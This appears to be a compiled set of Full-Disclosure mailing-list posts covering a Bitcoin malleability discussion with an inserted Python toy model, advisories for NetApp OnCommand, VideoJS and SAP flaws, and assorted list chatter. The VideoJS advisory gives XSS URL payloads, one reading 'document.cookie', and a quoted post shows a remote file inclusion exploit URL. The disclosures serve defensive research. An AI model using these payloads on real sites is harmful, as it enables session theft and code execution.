Re: [Full-disclosure] OT What is happening with bitcoins?

2014-03-11 Thread Ron Scott-Adams
Julius hit the nail on the head here. Transaction malleability is not some 
heretofore undiscovered bug in the Bitcoin implementation. It was a known 
entity long ago, and presumably with the creator(s)' awareness. It really isn’t 
a problem itself; it’s perfectly mitigable with the correct implementations on 
the exchange’s side. It’s worth noting nearly all of the FUD surrounding BTC 
comes down to mistakes made with and among exchanges. Exchanges of any kind 
carry risk, and a new kind of exchange such as this is bound to have some 
serious question marks in the first many years of existence.

For more on transaction malleability and the technical considerations, see 
https://en.bitcoin.it/wiki/Transaction_Malleability, noting especially the 
following:
“...this does mean that, for instance, it is not safe to accept a chain of 
unconfirmed transactions under any circumstance because the later transactions 
will depend on the hashes of the previous transactions, and those hashes can be 
changed until they are confirmed in a block.”

The above is a huge note, and is made clear elsewhere as well. However, 
mistakes around this were still made, and continue to be made today. Live and 
learn, caveat emptor, etc.

On Mar 10, 2014, at 10:57 AM, Julius Kivimäki wrote:

> Saying that the malleability thing is an issue with bitcoins is like saying 
> that sql injection is an issue with mysql.
> 
> 
> 2014-03-07 15:58 GMT+02:00 Meaux, Kirk:
> More to the point, has the transaction malleability issue been fixed that 
> caused Magic’s downfall?
> 
> Even though most exchanges just code around it, it’s still kind of a really 
> big issue if it isn’t fixed. :d
> 
>  
> 
>  
> 
> From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
> Behalf Of Pedro Worcel
> Sent: Thursday, March 06, 2014 6:09 PM
> To: Georgi Guninski
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] OT What is happening with bitcoins?
> 
>  
> 
> Bitcoins are doing great actually. =)
> 
> Used to be worth 0 a few years back, useless, and now you can use them to buy 
> some stuff.
> 
> 
>  
> 
> 2014-03-07 4:06 GMT+13:00 Georgi Guninski:
> 
> Read on theregister that bitcoins are in trouble.
> 
> Allegedly mtgox lost $400M maybe related to
> transactions.
> 
> Are the bugs in bitcoin or just sufficiently
> many ones got rooted?
> 
> Is bitcoin still alive?
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 
> --
> 
> GPG: http://is.gd/droope
> 
> 

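A toy model, added here and not code from the thread or from any Bitcoin implementation, of the behaviour the wiki quote describes and of the exchange-side mitigation Ron refers to: the signature commits only to the outpoints and outputs, while the txid hashes the whole serialisation including scriptSig, so a relaying node can change the id of a valid transaction before it confirms, which strands any chained transaction and confuses a ledger keyed on txid. HMAC stands in for ECDSA, the serialisation format is invented, and the key and outpoint values are constructed.

```python
import hashlib
import hmac
import json
from dataclasses import dataclass


def sha256d(data: bytes) -> bytes:
    """Bitcoin-style double SHA-256."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


@dataclass
class TxIn:
    prev_txid: str           # id of the transaction whose output is being spent
    prev_vout: int           # index of that output
    script_sig: bytes = b""  # signature plus its encoding; NOT covered by the signature

@dataclass
class TxOut:
    value: int               # satoshis
    address: str

@dataclass
class Tx:
    vin: list
    vout: list

    def sighash(self) -> bytes:
        """The data a signature commits to: outpoints and outputs, never scriptSig."""
        body = {"in": [[i.prev_txid, i.prev_vout] for i in self.vin],
                "out": [[o.value, o.address] for o in self.vout]}
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).digest()

    def serialize(self) -> bytes:
        """Toy wire format: the signed data followed by every scriptSig."""
        return self.sighash() + b"".join(i.script_sig for i in self.vin)

    def txid(self) -> str:
        """Hashes the whole serialisation, so it changes whenever a scriptSig changes."""
        return sha256d(self.serialize()).hex()


SIG_LEN = 32  # bytes of actual signature at the front of each scriptSig


def sign(tx: Tx, key: bytes) -> Tx:
    """HMAC stands in for ECDSA; only tx.sighash() is signed."""
    sig = hmac.new(key, tx.sighash(), hashlib.sha256).digest()
    for txin in tx.vin:
        txin.script_sig = sig
    return tx


def verify(tx: Tx, key: bytes) -> bool:
    """Validators check the signature bytes and tolerate trailing encoding noise,
    the toy counterpart of the non-canonical scriptSig encodings that let anyone
    relaying a transaction change its id without invalidating it."""
    want = hmac.new(key, tx.sighash(), hashlib.sha256).digest()
    return all(hmac.compare_digest(i.script_sig[:SIG_LEN], want) for i in tx.vin)


def relay_with_reencoded_scriptsig(tx: Tx) -> Tx:
    """A relaying node re-encodes scriptSig before the tx is mined; no key needed."""
    return Tx([TxIn(i.prev_txid, i.prev_vout, i.script_sig + b"\x00") for i in tx.vin],
              list(tx.vout))


def payment_fingerprint(tx: Tx) -> str:
    """Malleation-proof identity for bookkeeping: derived only from signed data."""
    return tx.sighash().hex()


def reconcile(pending: dict, confirmed: list) -> dict:
    """pending: withdrawal id -> Tx the exchange broadcast; confirmed: mined Txs.
    Matches on fingerprint rather than txid, so a mutated copy still counts as paid."""
    seen = {payment_fingerprint(t) for t in confirmed}
    return {wid: ("paid" if payment_fingerprint(t) in seen else "unconfirmed")
            for wid, t in pending.items()}


def demo() -> tuple:
    key = b"constructed-hot-wallet-key"
    # The exchange pays a customer from a confirmed coin (constructed outpoint).
    withdrawal = sign(Tx([TxIn("aa" * 32, 0)],
                         [TxOut(50_000, "customer"), TxOut(10_000, "change")]), key)
    broadcast_id = withdrawal.txid()
    # The mistake the wiki warns about: chaining a second payment off the
    # still-unconfirmed change output, addressed by the first tx's current id.
    child = sign(Tx([TxIn(broadcast_id, 1)], [TxOut(9_000, "other-customer")]), key)
    # A relay re-encodes the first tx; that copy is the one that gets mined.
    mined = relay_with_reencoded_scriptsig(withdrawal)
    still_valid = verify(mined, key)
    txid_changed = mined.txid() != broadcast_id
    child_orphaned = child.vin[0].prev_txid != mined.txid()  # spends an id that never confirms
    naive = "paid" if mined.txid() == broadcast_id else "missing"  # txid-keyed ledger
    robust = reconcile({"w1": withdrawal}, [mined])["w1"]            # fingerprint-keyed
    return still_valid, txid_changed, child_orphaned, naive, robust
```

The txid-keyed ledger reports the withdrawal as missing and a naive implementation would re-send it, while the fingerprint-keyed reconciliation sees it was paid; waiting for confirmation before chaining or re-sending is the other half of the mitigation.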


[Full-disclosure] Unsubscribe

2013-05-08 Thread Ron Yount
Email address to be inactive.  Please unsubscribe.





-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of SEC Consult Vulnerability Lab
Sent: Tuesday, May 7, 2013 12:57 AM
To: bugtraq; full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] SEC Consult SA-20130507-0 :: Multiple 
vulnerabilities in NetApp OnCommand System Manager

SEC Consult Vulnerability Lab Security Advisory < 20130507-0 >
===============================================================
              title: Multiple vulnerabilities
            product: NetApp OnCommand System Manager
 vulnerable version: <= 2.1 and <= 2.0.2
      fixed version: 2.2 (only XSS fixed)
                CVE: CVE-2013-3320 (XSS)
                     CVE-2013-3321 (File inclusion)
                     CVE-2013-3322 (OS command execution)
             impact: medium
           homepage: http://www.netapp.com/
              found: 2012-11-06
                 by: M. Heinzl
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com/
===============================================================


Vendor description:
---

"You don't need to be a storage expert to manage NetApp storage systems.
Configuration and ongoing storage management are easy using the Web-based 
OnCommand® System Manager. System Manager is the simple yet powerful management 
solution for NetApp storage it's easy for small to midsize businesses to use and 
efficient for large enterprises and service providers."

Source: 
http://www.netapp.com/us/products/management-software/system-manager.html


Vulnerability overview/description:
---

NetApp OnCommand System Manager suffers from multiple permanent and reflective 
cross-site scripting vulnerabilities, a local file inclusion vulnerability as 
well as an OS command execution vulnerability.

Malicious, authenticated users can exploit these flaws to change the contents 
of the displayed site, redirect the user to other sites, steal user 
credentials, execute system commands and read sensitive information.

The vendor will not fix the file inclusion and OS command execution issues, as 
it is considered a design feature. 



Proof of concepts:
-

1) Multiple Reflective Cross-Site Scripting Vulnerabilities (internal bug 
number 654355) - CVE-2013-3320

When configuring CIFS (Configuration > Protocols > CIFS > Configuration > 
Setup), JavaScript can be inserted into the parameters  and 
.

Request (domain-name):
POST /zapiServlet HTTP/1.1
Host: 127.0.0.1:1195

[...]

http://www.netapp.com/filer/admin";>workgroupmultiprotocolFILER


Furthermore, when creating new LUNs or editing already existing ones (Storage > 
LUNs > (Create or Edit)), JavaScript can be inserted into the parameter 
.


2) Multiple permanent cross-site scripting vulnerabilities (internal bug number 
654355) - CVE-2013-3320

When creating new users or editing already existing ones (Configuration > Local 
Users and Groups > Users > (Create or Edit)), JavaScript can be inserted into 
the parameters  and .

Request (full-name):
POST /zapiServlet HTTP/1.1
Host: 127.0.0.1:1457

[...]

http://www.netapp.com/filer/admin";>testtesttest42949672950Administrators


Furthermore, when creating new groups or editing already existing ones 
(Configuration > Local Users and Groups > Groups > (Create or Edit)), 
JavaScript can be inserted into the parameter .


When creating new shares or editing already existing ones (Storage > Shares > 
(Create or Edit)), JavaScript can be inserted into the parameter .


3) Local File Inclusion (internal bug number 654357) - CVE-2013-3321 *

When retrieving log files through SnapMirror (Diagnostics > SnapMirror Log), the 
path can be changed to read arbitrary files from the file system.


4) OS Command Execution (internal bug number 654360) - CVE-2013-3322 *

When using the Halt/Reboot interface (Configuration > System Tools > 
Halt/Reboot), arbitrary OS commands can be injected.


* To exploit these issues, the attacker must be authenticated as root. The 
vendor will not fix these issues, as it is considered a design feature. Hence 
no proof of concept will be included within this advisory.


Vendor contact timeline:

2012-11-06: Contacting vendor through security-in...@netapp.com
2012-11-06: Initial vendor response
2012-11-07: Forwarding security advisory to vendor
2012-11-07: Vendor acknowledges that the advisory was received
2012-11-14: Asking vendor for a status update
2012-11-14: Vendor asks for more time to address the issues
2012-11-27: Asking vendor for a conference call to discuss further details
2012-11-28: Conference call scheduled for 12th of December
2012-12-12: Conference call 
2012-12-17: Requested feedback from the vendor
2013-02-07: Requested again for feedback/status update on reported
vulnerabilit

Re: [Full-disclosure] Vulnerabilities in VideoJS

2013-05-08 Thread Ron Yount
Please unsubscribe.  Address to be inactive

-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of MustLive
Sent: Monday, May 6, 2013 4:45 PM
To: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk; 
1337 Exploit DataBase
Subject: [Full-disclosure] Vulnerabilities in VideoJS

Hello list!

I want to inform you about vulnerabilities in VideoJS. This is a popular video 
and audio player, which is used at hundreds of thousands of web sites and in 
multiple web applications.

This is a Cross-Site Scripting vulnerability in VideoJS. There is also a DoS hole 
related to this player, which I found on 27.01.2013 at vine.co, which was 
using VideoJS Flash Component v3.0 (http://vine.co/v/b5HpgZT3ZwL).
Since it concerned Flash Player, Adobe already fixed it on 12th of February.

More information is in my advisory for DoS vulnerability in Adobe Flash Player 
(http://seclists.org/fulldisclosure/2013/Apr/9). Here is my video demonstration 
of BSOD in Adobe Flash in Mozilla Firefox with using VideoJS 
(http://www.youtube.com/watch?v=xi29KZ3LD80).

-
Affected products:
-

Vulnerable are versions before VideoJS Flash Component 3.0.2 and VideoJS 4.0. 
Versions VideoJS Flash Component 3.0.2 and VideoJS 4.0 are not vulnerable to 
mentioned XSS hole, except XSS via JS callbacks (as it can be read in 
repository on github). Also there are bypass methods which work in the last 
version, but the developers haven't fixed them due to their low impact. This 
week developers are planning to officially release VideoJS 4.0 (but swf-file 
with fixed XSS hole is already available at video.js and video-js-swf 
repositories on github).

The updated version of VideoJS.swf is available in the following repositories:

https://github.com/videojs/video-js-swf
https://github.com/MustLive/video-js-swf

-
Affected vendors:
-

Earlier Zencoder, now Brightcove
http://videojs.com

--
Details:
--

Cross-Site Scripting (WASC-08):

http://site/video-js.swf?readyFunction=alert(document.cookie)

But the fix in VideoJS Flash Component 3.0.2 does not protect against the following
attacks:

http://site/video-js.swf?readyFunction=alert

http://site/video-js.swf?readyFunction=prompt

http://site/video-js.swf?readyFunction=confirm

These are small ones and the developers don't worry about them, so after I 
drew their attention last week to the incomplete fix, they still released that 
fix. But they will think about improving their protection in future 
versions.


Timeline:
 

2013.01.27 - found DoS (BSOD) vulnerability.
2013.01.28 - recorded video PoC. And in the night have informed Adobe.
2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked and promised to fix it.
2013.02.12 - Adobe fixed DoS vulnerability.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the 
hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And made 
my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) and 
uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed the 
hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 




Re: [Full-disclosure] [ESNC-2013-005] Remote Code Injection in SAP ERP Central Component - Project System

2013-05-08 Thread Ron Yount
Please unsubscribe.  Address to be inactive.

-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On 
Behalf Of ESNC Security
Sent: Monday, May 6, 2013 10:31 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [ESNC-2013-005] Remote Code Injection in SAP ERP 
Central Component - Project System

[ESNC-2013-005] Remote Code Injection in SAP ERP Central Component - Project 
System

Please refer to http://www.esnc.de for the original security advisory, updates 
and additional information.


1. Business Impact


Project System, which is part of SAP ERP, provides tools to track project costs 
and resources. It is tightly integrated with Controlling, Human Resources, and 
Logistics modules.

This vulnerability allows execution of arbitrary program code of the user's 
choice.

According to SAP, the user can:

* "Inject and run their own code,

* Obtain additional information that should not be displayed,

* Modify data, delete data."

Since this issue exists in a remote function module, an attacker can directly call 
the RFC from the network or from the Internet via SOAP-RFC services.

Risk Level: High


2. Advisory Information


-- ESNC Security Advisory ID: ESNC-2013-005
-- CVE ID: CVE-2013-3244
-- Original security advisory:
http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/58-remote-code-injection-in-sap-erp-project-system
-- Vendor Patch Date: 11.12.2012
-- Public Advisory Date: 07.05.2013
-- Researcher: Ertunga Arsal


3. Vulnerability Information


-- Vendor: SAP
-- Affected Components: ERP Central Component PS-IS
-- Affected Versions: Please refer to SAP note for more information
-- Vulnerable Function: CJDB_FILL_MEMORY_FROM_PPB
-- Vulnerability Class: Remote Code Injection
-- CVSS v2 score by the vendor: 7.5 AV:N/AC:M/AU:S/C:P/I:P/A:C
-- Remotely Exploitable: Yes
-- Authentication Required: Yes
-- Additional Notes: An exploit for this vulnerability is available in ESNC 
Penetration Testing Suite


4. Solution


Please apply the security patch [SAP Note 1776695] supplied by the vendor.
More information can be found at vendor's site:

https://service.sap.com/sap/support/notes/1776695

To prevent this and similar flaws, enterprises can use ESNC Code Security for 
scanning their own ABAP code or for assessing the security of the ABAP programs 
installed on their SAP systems.


About ESNC


ESNC GmbH, Germany is a company specialized in SAP penetration testing, ABAP 
security review and SAP vulnerability assessment services.

Its flagship product ESNC Security Suite is used by many large enterprises for 
security scanning their SAP ABAP and Java AS systems, running ABAP code 
inspection, enforcing security compliance and for providing SAP security 
monitoring.

For more information about our products and services, please visit our web page 
at http://www.esnc.de



[Full-disclosure] EC-Council's Sanjay Bavisi Hacking Series: Identifying Target IPs and Monitoring Google IPs

2011-07-08 Thread Ron Goldstien
Hello hackers, here is EC-Council's Sanjay "Jay" Bavisi's Hacking Series
video tutorial #1. Today, Jay shows you how to:

   1. Identify your network speed
   2. Find the IP addresses of your targets
   3. Use Tracer T to find who is looking at any website
   4. Use Tracer T to find who is viewing google at this moment
   5. Monitor other people's network speeds


As always friends, use this information for Certified Ethical Hacking (CEH)
and Certified Ethical Spamming (CES) purposes only. Without further ado:

http://www.youtube.com/watch?v=SXmv8quf_xM

Re: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit

2009-04-07 Thread Ron
You're correct that time machines don't exist yet. However, this is 
proof that they'll be invented in the next five months.

Stay tuned!

Mike Bann wrote:
> I highly doubt you reported this to Mozilla in "September of 2009". I 
> don't think time machines like that exist yet, but i'd be pleased to be 
> wrong.
> 
> Berend-Jan Wever wrote:
>> ...sigh
>>
>> This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I 
>> reported to Mozilla in September of 2009. It is a NULL ptr DoS, there 
>> is no "exploit" in the sense of executing arbitrary code, just a 
>> "repro" that can trigger a crash. The repro provided by Carl is the 
>> exact same repro I provided to Mozilla.
>>
>> Incidentally, Carl has reported this exact same bug 
>> before: http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is 
>> how the repro got on milw0rm in the first place 
>> (http://milw0rm.com/exploits/8091). Aditya K Sood later submitted the 
>> repro (slightly modified) to milw0rm as his code as well 
>> (http://milw0rm.com/exploits/8219).
>>
>> Some say plagiarism is the sincerest form of flattery, so I guess I'll 
>> start obfuscating my repros into ASCII art that says "SkyLined" to 
>> prevent any more people from flattering me.
>>
>> Cheers,
>> Sky
>>
>>
>> Berend-Jan Wever
>> http://skypher.com/SkyLined
>>
>>
>>
>>
>> On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick wrote:
>>
>> I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
>> a remote attacker to cause a DoS.
>> A 0-day exploit is available here:
>> 
>> http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv
>> 
>> 
>>


Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-14 Thread Ron
Larry Seltzer wrote:
> If they paid for access to the botnet then there's no real moral
> difference.

I'm not sure if I agree with that, you'd have to convince me.

To me, there's a huge difference between growing/cooking drugs and
buying/using them. I think the same sense applies here.

I agree that supporting the bot-runners is a bad idea, but I don't think
that paying them for their bots puts them on equal footing.

(In my humble opinion, of course)

Ron

-- 
http://www.skullsecurity.org/



Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-14 Thread Ron
Ivan . wrote:
> The BBC hacked into 22,000 computers as part of an investigation into
> cybercrime but the move quickly backfired, with legal experts claiming
> the broadcaster broke the law and security gurus saying the experiment
> went too far.
> 
> http://www.smh.com.au/news/technology/security/bbc-cybercrime-probe-backfires/2009/03/13/1236447465056.html

They keep saying that the BBC "hacked" 22,000 computers, when in reality
the original articles said the BBC "acquired" or "hijacked" the botnet.
Strawman for the win?



[Full-disclosure] CfP hack.lu 2008

2008-05-19 Thread Ron Bidule
For those of you that may be interested:


*Call for Papers Hack.lu 2008*

The purpose of the hack.lu convention is to give an open and free playground
where people can discuss the implication of new technologies in society.

hack.lu is a balanced mix convention where technical and non-technical
people can meet each other and freely share all kinds of information.

The convention will be held in the Grand-Duchy of Luxembourg in October 2008
(22-24.10.2008).



Scope
=====

Topics of interest include, but are not limited to:

* Software Engineering and Security
* Honeypots/Honeynets
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Electronic/Digital Privacy
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Legal and Social Aspect of Information Security
* Security in Information Retrieval
* Network security
* Forensics and Anti-Forensics
* Mobile communications security and vulnerabilities


Deadlines
=========

The following dates are important if you want to participate in the CfP:

Abstract submission : no later than 1 July 2008
Full paper submission : no later than 1st August 2008
Notification date : around end of August



Submission guideline (for standard paper track)
===============================================

Authors should submit a paper in English up to 5.000 words, using a
non-proprietary and open electronic format.

The program committee will review all papers and the author of each paper
will be notified of the result, by electronic means.

The abstract is up to 400 words. Submissions must be sent via the
http://www.hack.lu/ website.


Submissions should also include the following:

1. Presenter, geographical location (country of origin/passport) and
contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant, or an important
tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Whether the submission has already been presented, and where.



The information will be used only for the sole purpose of the
hack.lu convention, including the information on the public website.

If you want to remain anonymous, you have the right to use a nickname.


(Accepted) Speakers' Privileges
===============================

* Accommodation will be provided (3 nights)
* Travel expenses will be covered
* Conference speakers night


Publication and rights
======================

Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu convention
and its related electronic/paper publication.



Sponsoring
==========

If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu



Web site
========

http://www.hack.lu/

Barcamp and interactive session
===============================

During the conference, there is a continuous interactive session. You are
also very welcome to participate by submitting small ideas, a presentation or a
poster. The review process is simplified and open to anyone willing to take
an active role during the conference. You can submit your barcamp proposal using
the same web interface, but you don't need to submit a full paper.

Submissions are done via the hack.lu website (http://www.hack.lu/)


The hack.lu conference is organized by the ASBL CSRRT-LU (Computer Security
Research and Response Team Luxembourg)

Re: [Full-disclosure] nucleus 3.22 >> RFI

2007-05-07 Thread Ron Superior
Hi folks,

  Some months back I seem to remember people hypothesizing as to the
real purpose behind some of these particularly lame fake PHP exploits.
 You know the ones I mean; they're mostly remote file includes, they
often are decorated with some simple ASCII art, and the "thanks" and
"greetz" sections are always loaded with names that suggest Turkish or
other Middle Eastern origin.

  The two most interesting suggestions that I recall were:

  1) Somebody wanted to pump up the lists with PHP exploits so they
could claim later that some large number X of PHP vulnerabilities had
been posted to FD since some date.

  2) Covert communication, or that the "exploits" were really secret
messages between t3rr0ri$ts or something.

  I'm sure there exists a motive beyond just spamming us to be
annoying.  Any one have any new ideas, or good arguments for either of
the above two ideas?

Ron

Guasconi Vincent wrote:
> On 5/6/07, security curmudgeon <[EMAIL PROTECTED]> wrote:
>> : VENDOR :http://nucleuscms.org/
>> : BY : s3rv3r_hack3r (hackerz.ir admin)
>> : bug:
>> : nucleus3.22/nucleus/plugins/skinfiles/index.php   =
include($DIR_LIBS . 'PLUGINADMIN.php');
>> : Exloit:
>> : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
>>
>> I haven't examined the source code to this, but on June 16, 2006,
>> [EMAIL PROTECTED] disclosed RFI vulnerabilities [1] in four Nucleus
>> scripts, all with the DIR_LIBS variable as the injection point. This was
>> subsequently proven to be a false report as the variable was previously
>> set and could not be manipulated by an attacker.
>>
>> Have you actually tested this, or is this based on a quick grep of the
>> source code?
>
> They're like bots now.
> They didn't hear you, and you can't stop them.
>
> Try a spam rule.
>



Re: [Full-disclosure] rPSA-2007-0011-1 wget

2007-01-25 Thread Ron DuFresne


[SNIP]

>
> Description:
> Previous versions of the wget package can crash if they contact a
> malicious FTP server.  No further vulnerability is enabled by this
> minor flaw; system security is not threatened in any way.
>


Which might well be a good thing eh?  After all, if the site is malicious,
better the app die and dump than allow one to proceed to inflict harm upon
oneself?


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




[Full-disclosure] CTF in a box?

2006-10-15 Thread Ron Sweeney
Can anybody tell me if there is a simple CTF ruleset that maybe has its
own accompanying distro that others can play?



Re: [Full-disclosure] Linux kernel source archive vulnerable

2006-09-24 Thread Ron

Hi,

Hadmut Danisch wrote:
> Your assumption is false here. The kernel maintainers DO NOT say this:
> Read the README file, it does not contain any statement that you do
> not have to compile as root. They silently explain how to compile if
> you are not root, but they don't tell not to be root.


Sorry for being late, but I don't read full-disclosure often.  However,
I thought it prudent to cite this part of the Kernel README (this is
from the 2.6.10 kernel that I have installed, but I doubt it's changed):

--
 - Do a "make" to create a compressed kernel image. It is also
   possible to do "make install" if you have lilo installed to suit the
   kernel makefiles, but you may want to check your particular lilo
   setup first.

   To do the actual install you have to be root, but none of the normal
   build should require that. Don't take the name of root in vain.
--

Sounds like they recommend that to me?



Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)

2006-09-24 Thread Ron Jennings
Hi Tim,
   You make a great point.

Ron Jennings, NCIE SSP
Chaser Security - A Microsoft Partner
Cell: 559.360.2340 24hr. customer service
VOIP: 562.365.1295


From: Tim <[EMAIL PROTECTED]>
To: "pdp (architect)" <[EMAIL PROTECTED]>
CC: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)
Date: Fri, 22 Sep 2006 10:03:11 -0400

> Hello pdp,
>
> > http://www.gnucitizen.org/blog/self-contained-xss-attacks
> >
> > XSS attacks can be persistent and non-persistent. Persistent XSS is
> > more dangerous since it allow attackers to control exploited clients
> > for longer. On the other hand non-persistent XSS is considered less
> > dangerous although it has been widely used in many phishing attempts.
> >
> > In this article I will expose some of my findings around a new attack
> > vector which is of type non-persistent XSS but a lot more dangerous
> > than the persistent one.
> >
> > Some of you might be familiar with this attack vector; this subject
> > has been covered very vaguely in the past and none of its full
> > potentials has been explored. The impact of this attack is much bigger
> > today and could affect many web applications.
>
> This is a very interesting vector. However, I would argue that it is
> not a new class of XSS. Generally, the classes have been defined based
> on where the injected data flows from, not how it is injected in the
> page.
>
> For instance, stored or persistent XSS comes from an attacker via one
> communication, gets saved on the server, and is later reproduced to
> another user. Reflected is generally embedded in a link, sent to a
> victim, which a victim then sends to the webserver and is reflected back
> to achieve injection. DOM-based is similar, but does not need to flow
> to the webserver before coming back to get injected. I personally label
> these three classes Type 2, Type 1 and Type 0 respectively, in order to
> reduce confusion about terminology [1].
>
> All three of these scenarios could be used with your injection vector.
> A server side script could store the URL supplied by an attacker, and
> later present it to a victim, thus making it persistent. Similarly, a
> document.write() call could be exploited to inject a data: link, even if
> the typical dangerous characters (', ", <, >, etc) were handled.
>
> Don't get me wrong... I really like the vector, and what you've brought
> to the list. I just don't think it should be considered another class.
>
> cheers,
> tim
>
>
> 1. http://en.wikipedia.org/wiki/XSS
>
> -
> Sponsored by: Watchfire
>
> Cross-Site Scripting (XSS) is one of the most common application-level
> attacks that hackers use to sneak into web applications today. This
> whitepaper will discuss how traditional CSS attacks are performed, how to
> secure your site against these attacks and check if your site is protected.
> Cross-Site Scripting Explained - Download this whitepaper today!
>
> https://www.watchfire.com/securearea/whitepapers.aspx?id=70150008Vmr
> --

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE7 Zero Day

2006-05-05 Thread Ron DuFresne
On Fri, 5 May 2006 [EMAIL PROTECTED] wrote:

> On Fri, 05 May 2006 09:01:02 PDT, [EMAIL PROTECTED] said:
> > I do not support nor do I wish to participate in anything iDefense
> > does.  They are the original parasites of your industry.
>
> Actually, they're hardly the *original* parasites.  Others had
> that territory scoped out before they muscled in. :)
>

Yeah, but since he can't sploit this "vuln" he claims to have found, it's
perhaps not going to net him much interest nor cash from others, being
he's also holding his cards so close to his vest.


One might as well post it this way:

someplace, somewhere is a pc with a vulnerable application, guess where it
is and you can own it.  Oh, but, pay me big bucks first so I can eat well
for a day or two.


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




RE: [Full-disclosure] Google Groups e-mail disclosure in plain text

2006-04-19 Thread Ron Whitney

> This is my last ever Full-Disclosure post...

...and there was much rejoicing.



Re: [Full-disclosure] rainbowtables.schmoo.com dead?

2006-04-12 Thread Ron
Aha, the C killed me.  That's exactly why I should never trust my 
memory!  :)


Thanks for putting my mind at ease!

Ron

B Potter wrote:

"shmoo" has no "c".  that was the first problem :)

Also, we are right now in the process of migrating the tables to a new 
server.  Another 48 hours and you should be good to go.  Note that the 
tables are available via torrent so it doesn't kill the bandwidth nearly 
as bad as you would think.


later

bruce


On Apr 12, 2006, at 5:04 PM, Gridmark wrote:

Actually, it's http://rainbowtables.shmoo.com, but it's currently down 
for maintenance.


As per Shmoo.com:
"Some of our previous website content may be unavailable while we are 
performing updates."


-Gridmark

On 4/12/06, Ron <[EMAIL PROTECTED]> wrote:


Hello,

I found myself in a situation today where I needed to crack a Windows
password.  I decided that, since I have enough room to store them now,
I'd grab a table from http://rainbowtables.schmoo.com.  When I went
there, I discovered, to my horror, that I was redirected to a search
engine page.

Luckily, I managed to crack the passwords in a different way; they
were like 5-character alphabetic.  But the problem remains, I'd like
to get a good rainbow table.

Does anybody know another site where rainbow tables can be downloaded
for free?  A quick Google search turned up nothing.  If nothing comes
up, perhaps I'll generate my own tables, but I'd rather not spend
months doing it.

Thanks,
Ron





--
You will patch your PC or so help me god I will napalm your children.









Re: [Full-disclosure] Shell accounts

2006-04-12 Thread Ron DuFresne
On Tue, 11 Apr 2006 [EMAIL PROTECTED] wrote:

> On Tue, 11 Apr 2006 23:48:41 BST, Ian stuart Turnbull said:
> > Ha Ha. Yes, not a proper fiend hey. But I take it that I would be anonymous
> > technically.
>
> Nope.
>
> Hint - if you send a packet *out* from the shell account, it's probably as a
> result of another packet going *in* to the shell account.
>
> Even the stupidest of cops can figure out that "wow - every time a packet
> heads out from here to the Pentagon, a split second before, a similar packet
> came in from some bozo on a cablemodem in Idaho.  Maybe the Idaho guys need
> to pay this guy a visit"
>
> Yes, you can obfuscate it with setting cron jobs and tunnelling data via 
> covert
